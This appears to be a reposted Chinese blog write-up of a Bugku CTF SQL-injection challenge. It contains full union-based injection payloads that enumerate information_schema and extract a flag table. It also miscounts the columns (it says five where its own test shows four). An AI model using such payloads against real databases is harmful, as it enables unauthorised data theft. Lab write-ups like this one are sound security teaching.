标签：bugku name union flag 表名 table 成绩单 select

看起来像是SQL注入，先来试试。

输入1,2,3显示的是三个人成绩。

来试试是否存在注入。

输入1，正常。输入1' 错误。输入1’#正常，说明存在注入点。

首先来看下有几列从1开始试，1’ order by 4#正常，1’ order by 5#错误，说明有五列。

接下来开始使用联合查询，首先将id=-1，先手遍历一下看一下那几个表有回显：

 发现这四个表都有回显，然后开始爆破表名。

 得到数据库名skctf_flag，接下来爆表名：id=-1'union select 1,2,3,group_concat(table_name)from information_schema.tables where table_schema=database()#

得到两个表名 fl4g,sc  看起来fl4g像是存放flag的表，接下来开始爆字段：id=-1'union select 1,2,3,group_concat(column_name)from information_schema.columns where table_name=0x666c3467#注意最后的表名要用十六进制进行加密。

 得到字段skctf_flag，开始获取flagid=-1'union select 1,2,3,skctf_flag from fl4g#

 得到flag。

虽然现在工具很多，而且功能很强大，但是手注是基础，对我们理解sql注入的原理有很大的帮助，能手注还是尽量要手注的。

标签：bugku,name,union,flag,表名,table,成绩单,select
来源： https://www.cnblogs.com/lzlzzzzzz/p/11681309.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。